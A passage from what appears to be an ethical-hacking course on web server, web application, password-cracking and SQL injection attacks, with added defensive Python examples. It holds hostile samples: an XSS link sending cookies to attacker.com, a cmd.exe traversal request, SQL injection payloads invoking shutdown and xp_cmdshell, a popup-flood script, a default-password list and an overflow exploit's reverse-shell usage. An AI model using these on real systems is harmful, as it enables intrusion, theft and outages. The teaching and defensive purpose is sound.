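        if len(value) > MAX_HEADER_LENGTH:
            return ("deny", f"header-too-long:{name}")
    return ("allow", "")

if __name__ == "__main__":
    samples = [
        b"GET /default.asp HTTP/1.0\r\nHost: www.example.com\r\n\r\n",
        b"GET /NULL.printer HTTP/1.0\r\nHost: " + b"A" * 420 + b"\r\n\r\n",
        b"GET /site1/global.asa+.htr HTTP/1.0\r\n\r\n",
        b"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\r\n\r\n",
    ]
    for s in samples:
        print(s.split(b"\r\n", 1)[0], "->", screen_request(s))
```

A screen like this is a compensating control, not a fix: it buys time until the patch or the removal of the unused extension, which the IPP countermeasures slide lists first.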
Summary

• Web servers assume critical importance in the realm of Internet security.

• Vulnerabilities exist in different releases of popular web servers, and the respective vendors patch these often.

• The inherent security risks owing to compromised web servers have an impact on the local area networks that host these web sites, and even on the normal users of web browsers.

• Looking through the long list of vulnerabilities that have been discovered and patched over the past few years provides an attacker ample scope to plan attacks on unpatched servers.

• Different tools and exploit codes aid an attacker in perpetrating web server hacking.

• Countermeasures include scanning for existing vulnerabilities and patching them immediately, anonymous access restriction, and incoming traffic request screening and filtering.
Ethical Hacking

Module XII

Web Application Vulnerabilities

Module Objective

• Understanding Web Application Security
• Common Web Application Security Vulnerabilities
• Web Application Penetration Methodologies
• Input Manipulation
• Authentication And Session Management
• Tools: Lynx, Teleport Pro, Black Widow, Web Sleuth
• Countermeasures
Understanding Web Application Security

Common Web Application Vulnerabilities

• Reliability of Client-Side Data
• Special Characters that have not been escaped
• HTML Output Character Filtering
• Root accessibility of web applications
• ActiveX/JavaScript Authentication
• Lack of User Authentication before performing critical tasks.
Web Application Penetration Methodologies

• Information Gathering and Discovery
  - Documenting Application / Site Map
  - Identifiable Characteristics / Fingerprinting
  - Signature Error and Response Codes
  - File / Application Enumeration
    - Forced Browsing
    - Hidden Files
    - Vulnerable CGIs
    - Sample Files

• Input/Output Client-Side Data Manipulation

http://www.blazingtools.com

• Instant Source lets you take a look at a web page's source code, to see how things are done. Also, you can edit HTML directly inside Internet Explorer!

• The program integrates into Internet Explorer and opens a new toolbar window which instantly displays the source code for whatever part of the page you select in the browser window.
Instant Source

[Screenshot: Internet Explorer (Russian-language UI) at http://www.microsoft.com/ with the Instant Source toolbar open beneath the page. The toolbar shows the page's HTML source (<HTML>, <HEAD>, <META HTTP-EQUIV="Content-Type" ...>, <TITLE>Microsoft Corporation</TITLE>, <META http-equiv="PICS-Label" ...>, <META NAME="KEYWORDS" ...>, <META NAME="DESCRIPTION" ...>, <META NAME="MS.LOCALE" CONTENT="EN-US" />, <META NAME="CATEGORY" CONTENT="home page" />), tabs for www.microsoft.com, default.css, popup020912.js, ctredir.js and toolbar.js, and a tree of "External objects on this page" (images under www.microsoft.com/homepage/gif/ and /library/, plus Flash movies) with "Copy URL" and "Save..." buttons.]
Hacking Tool: Lynx

http://lynx.browser.org

Lynx is a text-based browser used for downloading source files and directory links.

[Screenshot: Lynx rendering the "Lynx Information" page: "News: Lynx 2.7 has been released"; Lynx is described as a text browser for the World Wide Web, with released versions running on VMS and various versions of Unix and ports to Win32 and DOS 386+ (via DJGPP) included in the current developmental version; pointers to Lynx links, the online help (press the ? key), and the lynx-dev mailing list for trouble reports; "Maintained by lynx-dev@browser.org".]
Hacking Tool: Wget

www.gnu.org/software/wget/wget.html

• Wget is a command line tool for Windows and Unix that will download the contents of a web site.

• It works non-interactively, so it will work in the background, even after you have logged off.

• Wget works particularly well with slow or unstable connections by continuing to retrieve a document until the document is fully downloaded.

• Both http and ftp retrievals can be time-stamped, so Wget can see if the remote file has changed since the last retrieval and automatically retrieve the new version if it has.
Hacking Tool: Black Widow

http://softbytelabs.com

• Black Widow is a website scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program.

• Use it to scan a site and create a complete profile of the site's structure, files, e-mail addresses, external links and even link errors.
[Screenshot: Black Widow with Site URL http://chandra.harvard.edu/ and the tabs Browser, Structures, Emails, Ext Links and Link Err; a Threads panel; the rendered Chandra home page ("Chandra's First Images!!!", "Launch Occurred 81 days ago", Photo Album, Chandra Chronicles, Pressroom, Poll); and a status bar showing the verify, fetch and download buffers at 0 left, Status: Done, Elapsed: 00:00:50, with the folder, file and byte counts of the ripped site.]
Hacking Tool: WebSleuth

• http://sandsprite.com/sleuth/

• WebSleuth is an excellent tool that combines spidering with the capability of a personal proxy such as Achilles.

[Screenshot: the WebSleuth window with the tabs Browser, Source, Intercept, Spider, Options and Notes, an address bar showing about:blank, side panels Properties, Toolbox, Plugins and Favorites, a link filter ("Filter LIKE *") and the message "No Links In Document".]
Hidden Field Manipulation

• Hidden fields are embedded within HTML forms to maintain values that will be sent back to the server.

• Hidden fields serve as a means for the web application to pass information between different applications.

• Using this method, an application may pass the data without saving it to a common backend system (typically a database).

• A major assumption about hidden fields is that since they are not visible (i.e. hidden), they will not be viewed or changed by the client.

• Web attacks challenge this assumption by examining the HTML code of the page and changing the request (usually a POST request) going to the server.

• By changing the value, the entire logic between the different application parts is damaged, and the application is manipulated to the new value.
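The server-side fix for the assumption described above, as an added example written for this edit (not course material). Values that must round-trip through the client are carried in hidden fields as before, but the server also emits a `sig` field: an HMAC-SHA256 over a canonical JSON encoding of the carried values under a secret only the server knows. On the next request `verify_posted_fields` recomputes the signature, so a client that edits `price` in the HTML (or drops the signature) is detected before any logic runs on the value. The secret, the field names and the sample values are constructed for the example.

```python
import hashlib
import hmac
import json
from html import escape

# Constructed server-side secret; a real deployment loads it from configuration.
SERVER_SECRET = b"constructed-demo-secret-change-me"

def _canonical(fields):
    """One unambiguous byte string for a set of fields (sorted keys, no whitespace),
    so that 'a=b&c' style ambiguities cannot make two different sets sign equal."""
    return json.dumps(fields, sort_keys=True, separators=(",", ":")).encode("utf-8")

def sign_fields(fields):
    """HMAC-SHA256 over the values the server wants to carry between pages."""
    return hmac.new(SERVER_SECRET, _canonical(fields), hashlib.sha256).hexdigest()

def render_hidden_fields(fields):
    """Emit the hidden inputs plus a 'sig' input binding them together."""
    inputs = [
        f'<input type="hidden" name="{escape(k, quote=True)}" value="{escape(v, quote=True)}">'
        for k, v in fields.items()
    ]
    inputs.append(f'<input type="hidden" name="sig" value="{sign_fields(fields)}">')
    return "\n".join(inputs)

def verify_posted_fields(form):
    """Recompute the signature over everything except 'sig'. Returns (ok, fields);
    on failure the fields are withheld so no later code can use them by mistake."""
    fields = {k: v for k, v in form.items() if k != "sig"}
    presented = form.get("sig", "")
    if not isinstance(presented, str) or not presented.isascii():
        return False, {}
    ok = hmac.compare_digest(presented, sign_fields(fields))   # constant-time compare
    return ok, (fields if ok else {})

if __name__ == "__main__":
    carried = {"item": "book-1234", "price": "29.99"}
    print(render_hidden_fields(carried))
    posted = dict(carried, sig=sign_fields(carried))
    print("untouched form verifies:", verify_posted_fields(posted)[0])
    posted["price"] = "0.01"
    print("tampered price verifies:", verify_posted_fields(posted)[0])
```

Signing only proves the values came from the server unchanged; it does not stop a client from replaying an older signed form, so values like a price are still better looked up server-side at the moment of use, with the signed field reduced to an identifier.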






Input Manipulation

• URL Manipulation - CGI Parameter Tampering
• HTTP Client-Header Injection
• Filter/Intrusion Detection Evasion
• Protocol/Method Manipulation
• Overflows




What is Cross Site Scripting (XSS)?

• A Web application vulnerable to XSS allows a user to inadvertently send malicious data to himself through that application.

• Attackers often perform XSS exploitation by crafting malicious URLs and tricking users into clicking on them.

• These links cause client-side scripting languages (VBScript, JavaScript, etc.) of the attacker's choice to execute on the victim's browser.

• XSS vulnerabilities are caused by a failure in the web application to properly validate user input.
Authentication And Session Management

• Brute / Reverse Force
• Session Hijacking
• Session Replay
• Session Forging
• Page Sequencing
Traditional XSS Web Application Hijack Scenario - Cookie stealing

• User is logged on to a web application and the session is currently active. An attacker knows of a XSS hole that affects that application.

• The user receives a malicious XSS link via an e-mail or comes across it on a web page. In some cases an attacker can even insert it into web content (e.g. guest book, banner, etc.) and make it load automatically without requiring user intervention.

<html>
<head><title>Look at this!</title></head>
<body><a href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tv=<script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>">Check this CNN story out!</a></body>
</html>
XSS Countermeasures

• As a web application user, there are a few ways to protect yourself from XSS attacks.

• The first and the most effective solution is to disable all scripting language support in your browser and email reader.

• If this is not a feasible option for business reasons, another recommendation is to use reasonable caution while clicking links in anonymous e-mails and dubious web pages.

• Proxy servers can help filter out malicious scripting in HTML.
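The slides list user-side countermeasures only; the application-side fix for the cookie-stealing scenario above is shown here as an added example that is not code from the course. Any user-supplied value is HTML-entity-encoded before it is reflected, so a script tag becomes inert text, and the session cookie is marked HttpOnly so document.cookie cannot read it even if some other injection succeeds. The search page, cookie name and payload are constructed for the illustration.

```python
import html
from http.cookies import SimpleCookie

# Constructed payload modelled on the cookie-stealing link in the scenario above.
PAYLOAD = ("<script>document.location.replace("
           "'http://attacker.example/steal.cgi?'+document.cookie);</script>")


def render_results_page_vulnerable(query: str) -> str:
    """The pattern the slides describe: user input returned to the client unchanged."""
    return f"<html><body><p>Results for: {query}</p></body></html>"


def render_results_page(query: str) -> str:
    """Reflect the user's query into the page, HTML-entity-encoding it first.

    html.escape rewrites < > & " ' as entities, so the browser displays the
    payload as text instead of parsing a <script> element out of it.
    """
    safe = html.escape(query, quote=True)
    return f"<html><body><p>Results for: {safe}</p></body></html>"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for a session cookie that page scripts cannot read
    and that the browser will only send over HTTPS."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True  # hidden from document.cookie
    jar["session"]["secure"] = True    # never sent over plain HTTP
    jar["session"]["path"] = "/"
    return jar.output(header="").strip()


def has_live_script(page: str) -> bool:
    """Does a raw <script element survive in the rendered page? True means XSS."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable:", has_live_script(render_results_page_vulnerable(PAYLOAD)))
    print("encoded:   ", has_live_script(render_results_page(PAYLOAD)))
    print("Set-Cookie:", session_cookie_header("abc123"))
```

Entity encoding is context-specific: html.escape is right for text and attribute values, but a value placed inside a script block or a URL needs the encoding for that context instead.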
Buffer Overflow in WINHLP32.EXE

• A buffer-overrun vulnerability in WINHLP32.EXE could result in the execution of arbitrary code on the vulnerable system.

• This vulnerability stems from a flaw in the Item parameter within the WinHLP Command.

• This exploit would execute in the security context of the currently logged on user.

• Microsoft has released Windows 2000 Service Pack 3 (SP3), which includes a fix for this vulnerability.
Hacking Tool: Helpme2.pl

• Helpme2.pl is exploit code for the WinHelp32.exe Remote Buffer Overrun vulnerability.

• This tool generates an HTML file with a given hidden command.

• When this HTML file is sent to a victim through e-mail, it infects the victim's computer and executes the hidden code.
Hacking Tool: WindowBomb

<HTML>
<HEAD>
<TITLE>WARNING! Infecting Virus!</TITLE>
</HEAD>
<BODY onload="WindowBomb()">
<SCRIPT LANGUAGE="JavaScript">
function WindowBomb()
{
    var iCounter = 0 // dummy counter
    while (true)
    {
        window.open("http://www.netscape.com", "CRASHING" + iCounter, "width=1,height=1,resizable=no")
        iCounter++
    }
}
</SCRIPT>
</BODY>
</HTML>

An email ... up windows

JavaScript is vulnerable to simple coding such as this.
Hacking Tool: IEEN

http://www.securityfriday.com/ToolDownload/IEen

• IEEN remotely controls Internet Explorer using DCOM.

• If you know the account name and the password of a remote machine, you can remotely control the software components on it using DCOM. For example, Internet Explorer is one of the software components that can be controlled.





Summary

• Attacking web applications is the easiest way to compromise hosts, networks and users.

• Generally nobody notices web application penetration until serious damage has been done.

• Web application vulnerabilities can be eliminated to a great extent by ensuring proper design specifications and coding practices as well as implementing common security procedures.

• Various tools help the attacker to view the source code and scan for security holes.

• The first rule in web application development from a security standpoint is not to rely on client side data for critical processes. Using an encrypted session such as SSL and "secure" cookies is advocated instead of using hidden fields, which are easily manipulated by attackers.

• A cross-site scripting vulnerability is caused by the failure of a web based application to validate user supplied input before returning it to the client system.

• If the application accepts only expected input, then XSS can be significantly reduced.
Ethical Hacking

Module XIII

Web Based Password Cracking Techniques

Module Objective

• HTTP Authentication Basic & Digest
• NTLM Authentication
• Certificate Based Authentication
• Forms Based Authentication
• Microsoft Passport
• Password Guessing
• WebCracker
• Brutus
• WWWHACK
• Obi Wan Password Cracker
Basic Authentication

• Basic authentication is the most basic form of authentication to web applications.

• The authentication credentials are sent in clear text with base64 encoding (which can be trivially decoded) and are subject to eavesdropping and replay attacks.

• The use of 128 bit SSL encryption can thwart these attacks.
Digest Authentication

• Digest authentication is based on a challenge-response authentication model.

• The user makes a request without authentication credentials and the Web Server replies with a WWW-Authenticate header indicating that credentials are required.

• Instead of sending the user name and password, the server challenges the client with a random nonce.

• The client responds with the message digest of the username/password.
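An added example, not part of the course, contrasting the two schemes on the wire. A captured Basic header yields the password directly, while a Digest exchange carries only MD5(HA1:nonce:HA2) as defined in RFC 2617 (shown here in its original form without the qop extension), so an eavesdropper holds a response that is valid only for the nonce the server issued. The realm, nonces and credentials are constructed values.

```python
import base64
import hashlib
import hmac


def decode_basic(header_value: str):
    """Recover (user, password) from an 'Authorization: Basic <token>' value.

    Base64 is an encoding, not encryption: anyone who captures the header
    reads the password straight out of it.
    """
    scheme, _, token = header_value.partition(" ")
    if scheme != "Basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce) -> str:
    """Client side of RFC 2617 Digest (no qop):
         HA1 = MD5(username:realm:password)
         HA2 = MD5(method:uri)
         response = MD5(HA1:nonce:HA2)
    Only 'response' goes on the wire; the password never does."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def digest_verify(stored_ha1, method, uri, nonce, response) -> bool:
    """Server side: it keeps HA1 rather than the password and recomputes the
    response for the nonce it issued, so a response replayed under a later
    nonce does not verify."""
    ha2 = _md5(f"{method}:{uri}")
    expected = _md5(f"{stored_ha1}:{nonce}:{ha2}")
    return hmac.compare_digest(expected, response)


# Constructed values for the walkthrough.
REALM = "example-realm"
USER, PASSWORD = "alice", "s3cret"
NONCE_1 = "8f1a2b3c4d5e6f70"   # nonce the server issued for the first request
NONCE_2 = "00ff11ee22dd33cc"   # a later nonce; the captured response must fail here
URI = "/dir/index.html"


def walkthrough():
    """Return (what Basic leaks, digest accepted for its nonce, digest replayed later)."""
    basic_header = "Basic " + base64.b64encode(f"{USER}:{PASSWORD}".encode()).decode()
    leaked = decode_basic(basic_header)

    stored_ha1 = _md5(f"{USER}:{REALM}:{PASSWORD}")
    resp = digest_response(USER, REALM, PASSWORD, "GET", URI, NONCE_1)
    accepted_now = digest_verify(stored_ha1, "GET", URI, NONCE_1, resp)
    replay_later = digest_verify(stored_ha1, "GET", URI, NONCE_2, resp)
    return leaked, accepted_now, replay_later


if __name__ == "__main__":
    print(walkthrough())
```

Digest stops the password itself from crossing the wire, but HA1 is still an unsalted MD5 of a short secret, so the server-side store and the captured response both remain subject to offline guessing; TLS on top of either scheme is what actually removes the eavesdropper.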
NTLM Authentication

• NTLM Authentication is Microsoft's proprietary NT LAN Manager authentication algorithm over HTTP. It works on Microsoft Internet Explorer only.

• Integrated Windows authentication works the same way as Message Digest authentication.






Certificate Based Authentication

• Certificate authentication is stronger than other authentication mechanisms.

• Certificate authentication uses public-key cryptography and a digital certificate to authenticate a user. Certificates can be stored in smart cards for even greater security.

• There are no currently known attacks against PKI security so far.



Microsoft Passport Authentication

• Single sign-on is the term used to represent a system whereby users need only remember one user name and password, and be authenticated for multiple services.

• Passport is Microsoft's universal single sign-in (SSI) platform.

• It enables the use of one set of credentials to access any Passport enabled site such as MSN, Hotmail and MSN Messenger.

• Microsoft encourages third-party companies to use Passport as a universal authentication platform.






Forms-Based Authentication

• It is a highly customizable authentication mechanism that uses a form composed of HTML with <FORM> and <INPUT> tags delineating fields for users to input their username/password.

• After the data is input via HTTP or SSL, it is evaluated by some server-side logic and if the credentials are valid, then a cookie is given to the client to be reused on subsequent visits.

• The forms based authentication technique is a popular authentication technique on the internet.
Hacking Tool: WinSSLMiM

http://www.securiteinfo.com/outils/WinSSLMiM.shtml

• WinSSLMiM is an HTTPS Man in the Middle attacking tool. It includes FakeCert, a tool to make fake certificates.

• It can be used to exploit the Certificate Chain vulnerability in Internet Explorer. The tool works under Windows 9x/2000.

• Usage:

  - FakeCert: fc -h
  - WinSSLMiM: wsm -h






Password Guessing

• Password guessing attacks can be carried out manually or via automated tools.

• Password guessing can be performed against all types of Web Authentication.

• The common passwords used are: root, administrator, admin, operator, demo, test, webmaster, backup, guest, trial, member, private, beta, [company_name] or [known_username]
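A defender's view of the guessing tools this module lists, added as an example that is not from the course: automated guessing against web authentication shows up in the server log as a burst of 401 responses from one client, so the detection below parses Apache Common Log Format lines, counts 401s per client in a sliding time window and flags any client over a threshold. The log lines, threshold and window are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache Common Log Format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)

# Constructed sample: one client hammering /admin/, one client with a single typo.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2003:10:15:01 +0000] "GET /admin/ HTTP/1.0" 401 401
10.0.0.5 - - [12/Mar/2003:10:15:02 +0000] "GET /admin/ HTTP/1.0" 401 401
10.0.0.5 - - [12/Mar/2003:10:15:03 +0000] "GET /admin/ HTTP/1.0" 401 401
192.0.2.7 - - [12/Mar/2003:10:15:03 +0000] "GET /admin/ HTTP/1.0" 401 401
192.0.2.7 - - [12/Mar/2003:10:15:09 +0000] "GET /admin/ HTTP/1.0" 200 5120
10.0.0.5 - - [12/Mar/2003:10:15:04 +0000] "GET /admin/ HTTP/1.0" 401 401
10.0.0.5 - - [12/Mar/2003:10:15:05 +0000] "GET /admin/ HTTP/1.0" 401 401
this line is not in CLF and is skipped
10.0.0.5 - - [12/Mar/2003:10:15:06 +0000] "GET /admin/ HTTP/1.0" 401 401
"""


def parse_line(line):
    """Return (ip, timestamp, request, status), or None for lines that are not CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["req"], int(m["status"])


def find_guessing_sources(lines, threshold=5, window=timedelta(minutes=1)):
    """Map each client IP that produced at least `threshold` 401 responses
    inside any `window` to its total 401 count.

    Timestamps are sorted per client and scanned with a sliding window, so
    the check is linear in the number of failures.
    """
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[3] == 401:
            failures[rec[0]].append(rec[1])

    flagged = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


if __name__ == "__main__":
    print(find_guessing_sources(SAMPLE_LOG.splitlines()))
```

For forms-based logins the server returns 200 or 302 on both success and failure, so the same logic would key on the application's own "login failed" event rather than the HTTP status; the per-client sliding window is unchanged.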
Hacking Tool: WebCracker

• WebCracker is a simple tool that takes text lists of usernames and passwords and uses them as dictionaries to implement Basic authentication password guessing.

• It keys on an "HTTP 302 Object Moved" response to indicate a successful guess.

• It will find all successful guesses given in a username/password list.




Hacking Tool: Brutus

http://www.hoobie.net/brutus/

• Brutus is a generic password guessing tool that cracks various authentication types.

• Brutus can perform both dictionary attacks and brute-force attacks where passwords are randomly generated from a given character set.

• Brutus can crack the following authentication types:

  - HTTP (Basic authentication, HTML Form/CGI); POP3; FTP; SMB; Telnet




Hacking Tool: Obi Wan

http://www.phenoelit.de/obiwan/docu.html

• Obi Wan is a powerful Web password cracking tool. It can work through a proxy.

• Obi Wan uses wordlists and alternations of numeric or alpha-numeric characters as possible passwords.

• Since Webservers allow unlimited requests it is a question of time and bandwidth to break into a server system.



Hacking Tool: Munga Bunga

Munga Bunga's HTTP Brute Forcer - Version 1.0.3 (Build 3)

The Hackology Network - http://www.hackology.com

(Screenshot of the tool's main window: username to brute force, number of threads, word list for passwords, definition file for HTTP and server information, and options to skip passwords with errors, with spaces, or outside a length range.)
Dictionary Maker

You can download dictionary files from the Internet or generate your own.



Hacking Tool: PassList

Passlist is another character based password generator.






**** Passlist.txt generator for Brute ****
"The truth is out there"

Do you have a fixed beginning? (Y/N): y
Enter string: starwars

Enter the maximum number of random characters per password: 2

Generating passwords

Processing ... Please wait.

Process ended
Query string

• The query string is the extra bit of data in the URL after the question mark (?) that is used to pass variables.

• The query string is used to transfer data between client and server.

Example:

http://www.mail.com/mail.asp?mailbox=sue&company=abc%20com

You can attempt to change Joe's mailbox by changing the URL to:

http://www.mail.com/mail.asp?mailbox=sue&company=abc%20com
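Added example, not from the course, of the server-side rule that defeats this tampering: the mailbox named in the query string is opened only if the authenticated session owns it, and the other parameters are never treated as authorization inputs. The session store, ownership table and session ids are constructed for the illustration; the URL is the one from the slide.

```python
from urllib.parse import parse_qs, urlparse

# Constructed session store: session cookie value -> authenticated user.
SESSIONS = {"sess-joe-7f3a": "joe", "sess-sue-91c0": "sue"}

# Constructed ownership table: mailbox -> owning user (normally a database lookup).
MAILBOX_OWNER = {"joe": "joe", "sue": "sue", "shared-sales": "sue"}


def mailbox_from_url(url: str):
    """Extract the mailbox parameter from a mail.asp style URL, or None if absent."""
    params = parse_qs(urlparse(url).query)
    values = params.get("mailbox")
    return values[0] if values else None


def open_mailbox(url: str, session_id: str) -> str:
    """Authorization decision for a mailbox request.

    The URL names a mailbox and the session names a user; the server checks
    the pair against its own ownership table instead of trusting the URL.
    """
    user = SESSIONS.get(session_id)
    if user is None:
        return "401 not authenticated"
    mailbox = mailbox_from_url(url)
    if mailbox is None:
        return "400 mailbox parameter missing"
    if MAILBOX_OWNER.get(mailbox) != user:
        # The parameter points at someone else's mailbox: refuse and log it.
        return "403 forbidden"
    return f"200 opened mailbox {mailbox}"


if __name__ == "__main__":
    url = "http://www.mail.com/mail.asp?mailbox=sue&company=abc%20com"
    print(open_mailbox(url, "sess-sue-91c0"))
    print(open_mailbox(url, "sess-joe-7f3a"))
```

A 403 on a mailbox the session does not own is also a useful detection signal: legitimate users rarely edit the query string by hand.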
Hacking Tool: cURL

http://curl.haxx.se

curl 7.10 (win32) libcurl/7.10
Usage: curl [options...] <url>

• cURL is a multi-protocol transfer library.

• cURL is a free and easy-to-use client side URL transfer library, supporting FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and LDAP.

• cURL supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading, Kerberos, HTTP form based upload, proxies, cookies, user+password authentication, file transfer resume, http proxy tunneling and more.
Cookies

• Cookies are a popular form of session management.

• Cookies are often used to store important fields such as usernames and account numbers.

• Cookies can be used to store any data and all the fields can be easily modified using a program like CookieSpy.



Hacking Tool: ReadCookies.html

Reads cookies stored on the computer; this tool can be used for stealing cookies or cookie hijacking.




Hacking Tool: SnadBoy

http://www.snadboy.com

"Snadboy Revelation" turns the asterisks in password fields back into plain text passwords.



Summary

• The "basic" authentication scheme, the simplest method of authentication and one of the most commonly used authentication methods, sends authentication details in the clear.

• Digest authentication never sends the user's credentials across the network in the clear, but transmits an MD5 digest of the user's credentials.

• NTLM, a Microsoft-proprietary protocol, authenticates users and computers based on an authentication challenge and response.

• Certificate authentication, which uses public key cryptography and a digital certificate to authenticate, is stronger than other authentication mechanisms.

• Forms based authentication is a system in which unauthenticated requests are redirected to a web form where the unauthenticated users are required to provide their credentials.

• Attackers make use of different tools to get the better of the authentication protocols.

• It is therefore necessary to evaluate the most secure option while designing web applications to counter cracking activities.
Ethical Hacking

Module XIV
SQL Injection

Module Objective

• What is SQL Injection?
• Exploiting the weakness of Server Side Scripting
• Using SQL Injection techniques to gain access to a system
• SQL Injection Scripts
• Attacking Microsoft SQL Servers
• MS SQL Password Crackers
• Prevention and Countermeasures
Introduction - SQL Injection

OLE DB Errors

The user filled fields are enclosed by single quotation marks ('). So a simple test of the form would be to try using (') as the username.

Let us see what happens if we just enter ' in a form that is vulnerable to SQL insertion.

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Extra ) in query expression 'Userid='3306') or ('a'='a' AND Password=''.

/_booking/login3.asp, line 49

If you get this error, then we can try SQL injection techniques.
Input Validation attack

Example of a Login Page

(Screenshot: the EC-Council "Member Login Area" page with Username and Password fields, a Login button and a Forgot Password link.)

Input validation attack occurs here on a website
Login Guessing & Insertion

• The attacker can try to login without a password. Typical user names would be 1=1 or any text within single quotes.

• The most common problem seen on Microsoft MS-SQL boxes is the default <blank> sa password.

• The attacker can try to guess the username of an account by querying for similar user names (ex: 'ad%' is used to query for "admin").

• The attacker can insert data by appending commands or writing queries.
Shutting Down SQL Server

• One of SQL Server's most powerful commands is SHUTDOWN WITH NOWAIT, which causes it to shut down, immediately stopping the Windows service.

Username: '; shutdown with nowait; --
Password: [Anything]

• This can happen if the script runs the following query:

select userName from users where userName='; shutdown with nowait;--' and userPass=''
Extended Stored Procedures

• There are several extended stored procedures that can cause permanent damage to a system.

• We can execute an extended stored procedure using our login form with an injected command as the username as follows:

Username: '; exec master..xp_xxx; --
Password: [Anything]

Username: '; exec master..xp_cmdshell 'iisreset'; --
Password: [Anything]
SQL Server Talks!

This command uses the 'speech.voicetext' object, causing the SQL Server to speak:

admin'; declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528
waitfor delay '00:00:05' --
Hacking Tool: SQLdict

http://ntsecurity.nu/cgi-bin/download/sqldict.exe.pl

• "SQLdict" is a dictionary attack tool for SQL Server.

• It lets you test if the accounts are strong enough to resist an attack or not.




Hacking Tool: SQLExec

• This tool executes commands on compromised Microsoft SQL Servers using the xp_cmdshell stored procedure.

• It uses the default sa account with a NULL password. But this can be modified easily.

USAGE: SQLExec www.target.com

SQLExec 1.0 for Windows NT/2K/9X
Usage: SQLExec <Hostname>
****Do not use ip addresses of targets****
Hacking Tool: sqlbf

http://www.cqure.net/tools.jsp?id=10

• Sqlbf is a SQL Server Password Auditing tool. This tool should be used to audit the strength of Microsoft SQL Server passwords offline. The tool can be used either in BruteForce mode or in Dictionary attack mode. The performance on a 1GHz Pentium (256MB) machine is around 750,000 guesses/sec.

• To be able to perform an audit one needs the password hashes that are stored in the sysxlogins table in the master database.

• The hashes are easy to retrieve although you need a privileged account to do so, like an sa account. The query to use would be:

select name, password from master..sysxlogins

• To perform a dictionary attack on the retrieved hashes:

sqlbf -u hashes.txt -d dictionary.dic -r out.rep
Hacking Tool: SQLSmack

• SQLSmack is a Linux based Remote Command Execution tool for MSSQL.

• When provided with a valid username and password on a remote MS SQL Server, the tool allows executing commands by piping them through the stored procedure master..xp_cmdshell
Hacking Tool: SQL2.exe

• SQL2 is a UDP Buffer Overflow Remote Exploit hacking tool.

SQL Server UDP Buffer Overflow Remote Exploit
Modified from "Advanced Windows Shellcode"
Code by David Litchfield, david@ngssoftware.com
Modified by lion, fix a bug.
Welcome to HUC Website http://www.cnhonker.com

Usage:
sql2 Target [<NCHost> <NCPort> <SQLSP>]

Example:
Target is MSSQL SP 0:
C:\>nc -l -p 53
C:\>sql2 db.target.com 202.202.202.202 53 0
Target is MSSQL SP 1 or 2:
c:\>sql2 db.target.com 202.202.202.202
Preventive Measures

• Minimize Privileges of Database Connection
• Disable verbose error messages
• Protect the system account 'sa'
• Audit Source Code

  - Escape Single Quotes
  - Allow only good input
  - Reject known bad input
  - Restrict length of input
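Added example, not from the course, tying the preventive measures to the attacks shown earlier in this module: the login query from the "Shutting Down SQL Server" slide is rebuilt on SQLite so the weak and the corrected form can be run side by side. login_vulnerable() concatenates the username into the statement the way login3.asp does, so a lone quote produces the driver error the "OLE DB Errors" slide relies on and a comment sequence bypasses the password check; login_safe() binds the same inputs as parameters, and validate_username() applies the "allow only good input" rule. The table contents and credentials are constructed.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userName TEXT, userPass TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str):
    """String-concatenated query, as in the login3.asp example on the slides."""
    sql = (f"SELECT userName FROM users WHERE userName='{username}' "
           f"AND userPass='{password}'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as err:
        # A stray quote breaks the SQL syntax; a verbose driver error like this
        # is what the 'OLE DB Errors' slide uses as an injection indicator.
        return f"error: {err}"
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """Parameterized query: the inputs are bound as values, never parsed as SQL."""
    sql = "SELECT userName FROM users WHERE userName=? AND userPass=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def validate_username(username: str) -> bool:
    """Allowlist check: letters, digits and underscore only, 3 to 32 characters."""
    return re.fullmatch(r"[A-Za-z0-9_]{3,32}", username) is not None


def demo() -> dict:
    """Run both login paths against a quote probe and a comment-based bypass."""
    conn = make_db()
    # 'admin' followed by a comment marker: the AND userPass clause is commented out.
    injected = "admin' --"
    return {
        "vuln_quote": login_vulnerable(conn, "'", "x"),
        "vuln_bypass": login_vulnerable(conn, injected, "wrong"),
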